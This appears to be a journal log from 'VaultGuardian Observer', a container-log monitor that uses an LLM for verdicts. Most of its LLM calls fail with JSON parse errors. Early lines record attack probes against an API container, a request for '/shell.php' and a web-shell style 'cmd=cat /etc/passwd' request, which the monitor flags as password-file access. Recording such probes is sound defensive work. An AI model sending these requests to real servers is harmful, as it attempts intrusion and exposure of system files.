Mar 19 23:31:15 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:15.737110 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:47.255021805Z 10.0.1.9 - - [19/Mar/2026:23:29:47 +0000] "GET /shell.php HTTP/1.0" 4...
Mar 19 23:31:15 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:15.737261 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Password file access Line=2026-03-19T23:29:48.064933362Z 10.0.1.9 - - [19/Mar/2026:23:29:48 +0000] "GET /?cmd=cat+/etc/passwd HTTP/1.0" 200 34020 "-" "curl/8.5.0" "98.152.173.124"
Mar 19 23:31:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:22.975221 [observer] Pipeline: processed=293 pattern_hits=258 llm_calls=34 llm_errors=33 learned=0
Mar 19 23:31:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:22.975242 [observer] Patterns: hash=256 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35
Mar 19 23:31:32 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:32.233847 [llm] Failed to parse verdict from:
Mar 19 23:31:32 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:32.233941 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:31:32 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:32.233952 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:48.065267399Z 98.152.173.124 - - [19/Mar/2026:23:29:48 +0000] "api.admin.kovicloud....
Mar 19 23:31:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:52.975186 [observer] Pipeline: processed=305 pattern_hits=270 llm_calls=34 llm_errors=34 learned=0
Mar 19 23:31:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:52.975211 [observer] Patterns: hash=268 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35
Mar 19 23:32:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:32:22.975040 [observer] Pipeline: processed=308 pattern_hits=273 llm_calls=34 llm_errors=34 learned=0
Mar 19 23:32:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:32:22.975067 [observer] Patterns: hash=271 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35
Mar 19 23:32:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:32:52.975946 [observer] Pipeline: processed=310 pattern_hits=275 llm_calls=34 llm_errors=34 learned=0
Mar 19 23:32:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:32:52.975973 [observer] Patterns: hash=273 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35
Mar 19 23:33:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:33:22.975598 [observer] Pipeline: processed=314 pattern_hits=279 llm_calls=34 llm_errors=34 learned=0
Mar 19 23:33:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:33:22.975627 [observer] Patterns: hash=277 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35
Mar 19 23:33:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:33:52.989400 [observer] Pipeline: processed=316 pattern_hits=281 llm_calls=34 llm_errors=34 learned=0
Mar 19 23:33:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:33:52.989426 [observer] Patterns: hash=279 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35
Mar 19 23:34:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:22.974902 [observer] Pipeline: processed=320 pattern_hits=285 llm_calls=34 llm_errors=34 learned=0
Mar 19 23:34:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:22.974928 [observer] Patterns: hash=283 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35
Mar 19 23:34:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:50.334078 [llm] Failed to parse verdict from:
Mar 19 23:34:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:50.334117 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input
Mar 19 23:34:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:50.334127 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T23:34:31.558567317Z 2026-03-19 23:34:31: tc-qos-helper.sh: WARNING: FireQOS is not instal...
Mar 19 23:34:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:52.977076 [observer] Pipeline: processed=324 pattern_hits=287 llm_calls=36 llm_errors=35 learned=0
Mar 19 23:34:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:52.977115 [observer] Patterns: hash=285 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=37
Mar 19 23:35:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:10.121495 [llm] Failed to parse verdict from:
Mar 19 23:35:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:10.121536 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input
Mar 19 23:35:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:10.121545 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T23:34:31.561938200Z 2026-03-19 23:34:31: tc-qos-helper.sh: WARNING: Cannot find file '/us...
Mar 19 23:35:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:22.975055 [observer] Pipeline: processed=328 pattern_hits=290 llm_calls=37 llm_errors=36 learned=0
Mar 19 23:35:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:22.975081 [observer] Patterns: hash=288 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:35:30 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:30.374037 [llm] Failed to parse verdict from:
Mar 19 23:35:30 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:30.374077 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input
Mar 19 23:35:30 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:30.374087 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T23:34:31.563860191Z 2026-03-19 23:34:31: tc-qos-helper.sh: WARNING: Cannot find file '/et...
Mar 19 23:35:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:52.976136 [observer] Pipeline: processed=331 pattern_hits=293 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:35:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:52.976727 [observer] Patterns: hash=291 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:36:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:36:22.988657 [observer] Pipeline: processed=335 pattern_hits=297 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:36:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:36:22.988683 [observer] Patterns: hash=295 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:36:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:36:52.974957 [observer] Pipeline: processed=339 pattern_hits=301 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:36:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:36:52.974997 [observer] Patterns: hash=299 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:37:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:37:22.989425 [observer] Pipeline: processed=341 pattern_hits=303 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:37:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:37:22.989449 [observer] Patterns: hash=301 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:37:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:37:52.977475 [observer] Pipeline: processed=345 pattern_hits=307 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:37:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:37:52.977499 [observer] Patterns: hash=305 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:38:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:38:22.980412 [observer] Pipeline: processed=347 pattern_hits=309 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:38:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:38:22.980435 [observer] Patterns: hash=307 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:38:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:38:52.976520 [observer] Pipeline: processed=350 pattern_hits=312 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:38:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:38:52.976550 [observer] Patterns: hash=310 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:39:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:39:22.979109 [observer] Pipeline: processed=353 pattern_hits=315 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:39:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:39:22.979132 [observer] Patterns: hash=313 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:39:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:39:52.979726 [observer] Pipeline: processed=355 pattern_hits=317 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:39:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:39:52.979751 [observer] Patterns: hash=315 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:40:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:40:22.975979 [observer] Pipeline: processed=359 pattern_hits=321 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:40:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:40:22.976003 [observer] Patterns: hash=319 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:40:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:40:52.988482 [observer] Pipeline: processed=361 pattern_hits=323 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:40:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:40:52.988513 [observer] Patterns: hash=321 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:41:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:41:22.975853 [observer] Pipeline: processed=367 pattern_hits=329 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:41:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:41:22.975877 [observer] Patterns: hash=327 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:41:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:41:52.974858 [observer] Pipeline: processed=369 pattern_hits=331 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:41:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:41:52.974883 [observer] Patterns: hash=329 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:42:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:42:22.974993 [observer] Pipeline: processed=372 pattern_hits=334 llm_calls=37 llm_errors=37 learned=0
Mar 19 23:42:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:42:22.975019 [observer] Patterns: hash=332 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38
Mar 19 23:42:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:42:52.982745 [observer] Pipeline: processed=375 pattern_hits=335 llm_calls=39 llm_errors=37 learned=0
Mar 19 23:42:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:42:52.982776 [observer] Patterns: hash=333 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:43:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:03.205372 [llm] Failed to parse verdict from:
Mar 19 23:43:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:03.205420 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 23:43:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:03.205429 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T23:42:41.166819338Z GET /robots.txt 200 1.435 ms - 26
Mar 19 23:43:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:04.504751 [llm] Failed to parse verdict from:
Mar 19 23:43:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:04.504786 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:43:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:04.504795 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:42:41.166964701Z 216.73.216.37 - - [19/Mar/2026:23:42:41 +0000] "captain.admin.koviclo...
Mar 19 23:43:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:22.990742 [observer] Pipeline: processed=379 pattern_hits=339 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:43:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:22.990767 [observer] Patterns: hash=337 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:43:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:52.977727 [observer] Pipeline: processed=383 pattern_hits=343 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:43:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:52.977753 [observer] Patterns: hash=341 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:44:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:44:22.988589 [observer] Pipeline: processed=385 pattern_hits=345 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:44:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:44:22.988616 [observer] Patterns: hash=343 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:44:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:44:52.976005 [observer] Pipeline: processed=389 pattern_hits=349 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:44:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:44:52.976034 [observer] Patterns: hash=347 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:45:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:45:22.985571 [observer] Pipeline: processed=391 pattern_hits=351 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:45:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:45:22.985597 [observer] Patterns: hash=349 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:45:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:45:52.976584 [observer] Pipeline: processed=394 pattern_hits=354 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:45:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:45:52.976615 [observer] Patterns: hash=352 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:46:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:46:22.980409 [observer] Pipeline: processed=399 pattern_hits=359 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:46:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:46:22.980432 [observer] Patterns: hash=357 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:46:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:46:52.976221 [observer] Pipeline: processed=401 pattern_hits=361 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:46:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:46:52.976242 [observer] Patterns: hash=359 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:47:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:47:22.976026 [observer] Pipeline: processed=405 pattern_hits=365 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:47:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:47:22.976208 [observer] Patterns: hash=363 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:47:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:47:52.988421 [observer] Pipeline: processed=407 pattern_hits=367 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:47:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:47:52.988444 [observer] Patterns: hash=365 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:48:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:48:22.974795 [observer] Pipeline: processed=411 pattern_hits=371 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:48:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:48:22.974822 [observer] Patterns: hash=369 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:48:52.975862 [observer] Pipeline: processed=413 pattern_hits=373 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:48:52.975892 [observer] Patterns: hash=371 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:49:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:49:22.974898 [observer] Pipeline: processed=416 pattern_hits=376 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:49:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:49:22.974927 [observer] Patterns: hash=374 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:49:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:49:52.975007 [observer] Pipeline: processed=419 pattern_hits=379 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:49:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:49:52.975031 [observer] Patterns: hash=377 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:50:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:50:22.990741 [observer] Pipeline: processed=421 pattern_hits=381 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:50:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:50:22.990772 [observer] Patterns: hash=379 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:50:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:50:52.974960 [observer] Pipeline: processed=425 pattern_hits=385 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:50:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:50:52.975007 [observer] Patterns: hash=383 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:51:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:51:22.985513 [observer] Pipeline: processed=427 pattern_hits=387 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:51:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:51:22.985539 [observer] Patterns: hash=385 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:51:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:51:52.975239 [observer] Pipeline: processed=433 pattern_hits=393 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:51:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:51:52.975261 [observer] Patterns: hash=391 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:52:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:52:22.976291 [observer] Pipeline: processed=435 pattern_hits=395 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:52:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:52:22.976321 [observer] Patterns: hash=393 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:52:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:52:52.975652 [observer] Pipeline: processed=438 pattern_hits=398 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:52:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:52:52.975677 [observer] Patterns: hash=396 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:53:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:53:22.975799 [observer] Pipeline: processed=441 pattern_hits=401 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:53:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:53:22.975981 [observer] Patterns: hash=399 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:53:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:53:52.974974 [observer] Pipeline: processed=443 pattern_hits=403 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:53:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:53:52.974997 [observer] Patterns: hash=401 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:54:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:54:22.976586 [observer] Pipeline: processed=447 pattern_hits=407 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:54:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:54:22.976610 [observer] Patterns: hash=405 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:54:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:54:52.981727 [observer] Pipeline: processed=449 pattern_hits=409 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:54:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:54:52.981771 [observer] Patterns: hash=407 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:55:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:55:22.975119 [observer] Pipeline: processed=453 pattern_hits=413 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:55:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:55:22.975140 [observer] Patterns: hash=411 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:55:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:55:52.978906 [observer] Pipeline: processed=455 pattern_hits=415 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:55:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:55:52.978932 [observer] Patterns: hash=413 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:56:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:56:22.975297 [observer] Pipeline: processed=458 pattern_hits=418 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:56:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:56:22.975321 [observer] Patterns: hash=416 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:56:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:56:52.975127 [observer] Pipeline: processed=463 pattern_hits=423 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:56:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:56:52.975151 [observer] Patterns: hash=421 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:57:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:57:22.990841 [observer] Pipeline: processed=465 pattern_hits=425 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:57:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:57:22.990868 [observer] Patterns: hash=423 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:57:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:57:52.975107 [observer] Pipeline: processed=469 pattern_hits=429 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:57:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:57:52.975136 [observer] Patterns: hash=427 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:58:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:58:22.975739 [observer] Pipeline: processed=471 pattern_hits=431 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:58:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:58:22.975767 [observer] Patterns: hash=429 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:58:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:58:52.975014 [observer] Pipeline: processed=475 pattern_hits=435 llm_calls=39 llm_errors=39 learned=0
Mar 19 23:58:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:58:52.975041 [observer] Patterns: hash=433 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40
Mar 19 23:59:00 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:59:00.707524 [observer] Shutting down...
Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 19 23:59:00 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:59:00.713196 [observer] Final stats: processed=475 pattern_hits=435 llm_calls=39 learned=0
Mar 19 23:59:00 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:59:00.713213 [observer] Shutdown complete
Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: observer.service: Consumed 1.001s CPU time.
Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.729040 [observer] VaultGuardian Observer starting...
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.729115 [observer] Normalizer registry initialized
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.735517 [observer] Pattern store initialized (4 scopes)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.735798 [observer] Analyzer pipeline ready
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736038 [notifier] Generated default config at /var/lib/observer/notifications.yaml
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736409 [logwatch] Notifications:
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736561 [logwatch]   ✗ webhook    → not configured (set WEBHOOK_URL)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736677 [logwatch]   ✓ email      → drew@vaultdec.com
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736768 [logwatch]   ✗ sms        → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736860 [logwatch]   ✗ push/ios   → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736868 [logwatch]   ✗ push/fcm   → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.737216 [observer] Starting container log watcher...
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.745554 [watcher] Found 8 running containers
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.745768 [watcher] Streaming logs for srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.745871 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.745956 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746020 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746085 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746148 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
